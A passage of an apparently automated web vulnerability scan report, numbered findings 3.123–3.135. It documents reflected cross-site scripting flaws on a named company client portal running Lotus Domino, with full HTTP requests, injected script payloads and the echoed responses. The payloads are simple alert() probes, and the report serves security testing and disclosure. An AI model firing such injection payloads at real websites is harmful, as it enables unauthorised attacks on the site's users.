<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js4dbad"><script>alert(1)</script>40e20d2ddfe?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1" name="RedirectTo" />
...[SNIP]...

3.123. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 413d5'%3b0770860f755 was submitted in the REST URL parameter 1. This input was echoed as 413d5';0770860f755 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web413d5'%3b0770860f755/home.nsf/ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.6.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19186
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web413d5';0770860f755/home.nsf/'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1'
           RedirectTo = ''

   </script>
...[SNIP]...

3.124. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb203"><script>alert(1)</script>e67e920816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webeb203"><script>alert(1)</script>e67e920816/home.nsf/ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.6.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:18 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19282
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/webeb203"><script>alert(1)</script>e67e920816/home.nsf/" name="RedirectTo" />
...[SNIP]...

3.125. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7631f"><script>alert(1)</script>1c1d50ccf69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/home.nsf/?7631f"><script>alert(1)</script>1c1d50ccf69=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.6.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:07 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19276
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/?7631f"><script>alert(1)</script>1c1d50ccf69=1" name="RedirectTo" />
...[SNIP]...

3.126. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb4b1'-alert(1)-'9b480330d0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/home.nsf/?bb4b1'-alert(1)-'9b480330d0c=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.6.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:11 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19220
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/?bb4b1'-alert(1)-'9b480330d0c=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1'
           RedirectTo = ''

   </script>
...[SNIP]...

3.127. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56417"><script>alert(1)</script>860ececfc88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web56417"><script>alert(1)</script>860ececfc88/home.nsf/articlesByTitle/Registration%20FAQ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19273
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web56417"><script>alert(1)</script>860ececfc88/home.nsf/articlesByTitle/Registration FAQ" name="RedirectTo" />
...[SNIP]...

3.128. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a676'%3b6fd80229fed was submitted in the REST URL parameter 1. This input was echoed as 2a676';6fd80229fed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web2a676'%3b6fd80229fed/home.nsf/articlesByTitle/Registration%20FAQ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19173
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web2a676';6fd80229fed/home.nsf/articlesbytitle/registration faq'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.129. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58dc7'%3b6483071eb3a was submitted in the REST URL parameter 3. This input was echoed as 58dc7';6483071eb3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/home.nsf/articlesByTitle58dc7'%3b6483071eb3a/Registration%20FAQ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19208
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
nt&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/articlesbytitle58dc7';6483071eb3a/registration faq'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.130. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a234"><script>alert(1)</script>716d9e385a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/home.nsf/articlesByTitle3a234"><script>alert(1)</script>716d9e385a9/Registration%20FAQ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19333
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle3a234"><script>alert(1)</script>716d9e385a9/Registration FAQ" name="RedirectTo" />
...[SNIP]...

3.131. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 378dd'%3b08537c54579 was submitted in the REST URL parameter 4. This input was echoed as 378dd';08537c54579 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/home.nsf/articlesByTitle/Registration%20FAQ378dd'%3b08537c54579 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19259
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
No + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/articlesbytitle/registration faq378dd';08537c54579'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.132. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c3bc"><script>alert(1)</script>500a947cd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/home.nsf/articlesByTitle/Registration%20FAQ5c3bc"><script>alert(1)</script>500a947cd28 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19255
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration FAQ5c3bc"><script>alert(1)</script>500a947cd28" name="RedirectTo" />
...[SNIP]...

3.133. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46048"><script>alert(1)</script>d598d4d4e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/home.nsf/articlesByTitle/Registration%20FAQ?46048"><script>alert(1)</script>d598d4d4e90=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19263
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration FAQ?46048"><script>alert(1)</script>d598d4d4e90=1" name="RedirectTo" />
...[SNIP]...

3.134. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77b9c'-alert(1)-'67ce31187c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/home.nsf/articlesByTitle/Registration%20FAQ?77b9c'-alert(1)-'67ce31187c1=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19207
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
o + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/articlesbytitle/registration faq?77b9c'-alert(1)-'67ce31187c1=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.135. http://content.usv.com/decor/javascript/magnify_pipeline.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /decor/javascript/magnify_pipeline.js

Issue detail

